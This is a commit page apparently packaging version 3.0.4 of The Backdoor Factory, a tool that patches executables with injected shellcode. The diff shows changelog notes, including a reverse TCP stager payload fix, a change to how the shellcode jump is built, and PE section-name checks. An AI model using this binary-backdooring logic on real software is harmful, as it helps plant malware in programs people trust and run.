Commit b4a2273e authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 3.0.4

parent 51d82532
##The Backdoor Factory (BDF)
#### YOU MUST BE *THIS* TALL TO RIDE THIS RIDE
For security professionals and researchers only.
The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
DerbyCon 2013:
Video: http://www.youtube.com/watch?v=jXLb2RNX5xs
......@@ -221,6 +223,15 @@ Sample Usage:
###Changelog
####7/06/2015
* Clean exit if text section name is mangled or out of order.
####5/01/2015
* Bug fix to the reverse_tcp_stager_threaded payload when using single caves payload
####4/28/2015
* Adding check for Bound Imports (PE files with bound imports will not be patched)
......
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
Version: 3.0.2
Version: 3.0.4
"""
author = """\
......
......@@ -280,7 +280,8 @@ class winI32_shellcode():
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
......
......@@ -307,6 +307,17 @@ class pebin():
self.flItms['rsrcVirtualAddress'] = sectionValues[2]
self.flItms['rsrcSizeRawData'] = sectionValues[3]
self.flItms['rsrcPointerToRawData'] = sectionValues[4]
# I could add in checks here to support out of order PE file;
# However if here were multiple sections that were RE, RWE, it would be
# difficult to get it right in a purposefully mangled binary.
# Perhaps if entrypoint is in RE section that is text section? But still.
# That could be spoofed and it returns to another RE section.
if "textSectionName" not in self.flItms:
print "[!] Text section does not have a normal name, not guessing, exiting"
print "[!]\tFirst section, text section potential name:", str(self.flItms['Sections'][0][0])
return False
self.flItms['VirtualAddress'] = self.flItms['SizeOfImage']
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
......@@ -562,7 +573,8 @@ class pebin():
#get file data again
with open(self.flItms['backdoorfile'], 'r+b') as self.binary:
self.gather_file_info_win()
if not self.gather_file_info_win():
return False
return True
......@@ -960,7 +972,8 @@ class pebin():
if self.binary.read(2) != "\x4d\x5a":
print "%s not a PE File" % self.FILE
return False
self.gather_file_info_win()
if not self.gather_file_info_win():
return False
if self.flItms is False:
return False
if MachineTypes[hex(self.flItms['MachineType'])] not in supported_types:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment